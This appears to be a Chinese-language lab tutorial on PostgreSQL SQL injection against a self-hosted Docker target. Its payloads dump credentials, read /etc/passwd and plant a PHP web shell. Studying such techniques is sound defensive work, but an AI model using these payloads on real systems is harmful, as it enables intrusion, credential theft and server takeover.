postgresql注入的示例分析

小編給大家分享一下postgresql注入的示例分析，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

PostgreSQL 是一個免費的對象-關系數據庫服務器 (ORDBMS)，在靈活的 BSD 許可證下發行。

PostgreSQL 開發者把它念作 post-gress-Q-L。

PostgreSQL 的 Slogan 是 "世界上最先進的開源關系型數據庫"。

這里我們通過一個簡單的靶場來學習 postgresql 數據庫相關漏洞

一、瀏覽器訪問數據

這里我們是利用 docker 搭建的環境

訪問我們搭建的地址：http://172.16.1.238:90/index.php?uid=1

二、驗證注入

基于布爾型注入（boolean-based blind）

index.php?uid=1 AND 1=1 運行正常

index.php?uid=1 AND 1=2 運行異常

基于報錯注入（error-based）

獲取版本號：

select * from tbuser where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

獲取 Schemas 名稱

select * from tbuser where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

基于時間的盲注（time-based blind）

AND 6489=(SELECT 6489 FROM PG_SLEEP(5)) 延時 5 秒

基于堆疊查詢（多語句查詢，stacked queries）

?uid=1;select PG_SLEEP(5)--

基于聯合查詢（UNION query）

?uid=1 order by 1,2,3 運行正常

?uid=1 order by 1,2,3,4 運行異常，獲取字段數 3

?uid=1 UNION ALL SELECT NULL,('11111'),NULL-- 查看是否輸出 11111

獲取數據庫結構和內容

此處均為聯合查詢

獲取模式名稱（schemaname）名稱

?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--

語法解析：

COALESCE(expression[,n]) coalesce 函數返回參數（列名）中第一個非 NULL 值的字段值，注意不是為空''

cast ('1' as numeric) 1 轉換為數字類型

簡化：

?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

用戶創建的數據庫默認模式名稱（schemaname）為 public

獲取數據表名稱

uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

獲取表字段名稱

?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'—

獲取表內容

?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

三、文件或目錄操作

PostgreSQL 中部分內置函數、表

列目錄——只能列安裝目錄下的文件

?uid=1 union select NULL,NULL,pg_ls_dir('./')

讀文件

?uid=1;

CREATE TABLE passwd(t TEXT);

COPY passwd FROM '/etc/passwd';

SELECT NULL,t,NULL FROM passwd;

寫文件

?uid=1;

DROP TABLE pass;（這里需要為數據庫存在的表）

CREATE TABLE hacktb (t TEXT);

INSERT INTO hacktb(t) VALUES ('<?php @system("$_GET[cmd]");?>');

COPY hacktb(t) TO '/tmp/hack.php';

以上是“postgresql注入的示例分析”這篇文章的所有內容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內容對大家有所幫助，如果還想學習更多知識，歡迎關注億速云行業資訊頻道！